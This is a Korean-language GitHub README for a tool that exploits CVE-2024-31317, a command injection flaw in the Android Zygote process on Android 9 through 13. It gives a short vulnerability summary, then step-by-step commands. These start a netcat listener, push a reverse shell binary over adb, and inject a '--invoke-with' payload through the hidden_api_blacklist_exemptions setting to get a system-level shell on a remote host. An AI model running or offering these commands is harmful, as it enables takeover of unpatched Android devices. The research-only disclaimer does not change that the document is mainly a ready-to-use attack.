
CVE-2024-31317
이 프로젝트는 보안 연구 및 교육 목적으로만 사용됩니다. 이 도구를 사용하여 승인되지 않은 테스트를 수행하는 것은 불법입니다. 저자는 어떠한 오용이나 손해에 대해서도 책임을 지지 않습니다.
CVE-2024-31317은 Android 9부터 Android 13까지의 기기에 영향을 미치는 심각한 보안 취약점으로, WRITE_SECURE_SETTINGS 권한을 가진 애플리케이션이 명령어 주입을 통해 시스템 수준 권한 실행을 얻을 수 있습니다.
이 프로젝트는 해당 취약점에 대한 상세 기술 분석, 개념 증명 코드 및 자동 배포 도구를 제공합니다.
| 항목 | 세부사항 |
|---|---|
| CVE ID | CVE-2024-31317 |
| 취약점 유형 | 명령어 주입 |
| 심각도 등급 | 높음 (High) |
| CVSS 점수 | 7.8 |
| 영향을 받는 구성 요소 | Android Zygote 프로세스 |
| 수정 상태 | 2024년 6월 Android 보안 패치에서 수정됨 |
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer
chmod +x compile.sh
./compile.sh
# 리스너 시작
nc -lvnp 4444
# 푸시 및 실행
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell
# payload 주입
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"
# 취약점 트리거
adb shell stop && adb shell start
이 프로젝트는 보안 연구 및 교육 목적으로만 제공됩니다. 이 도구를 사용함으로써 귀하는 다음에 동의하게 됩니다:
이 프로젝트는 MIT 라이선스에 따라 제공됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요
fcy10012 - GitHub
참고 프로젝트: WebLDix/CVE-2024-31317-PoC-Deployer
⭐ 이 프로젝트가 도움이 되셨다면 별표를 눌러주세요!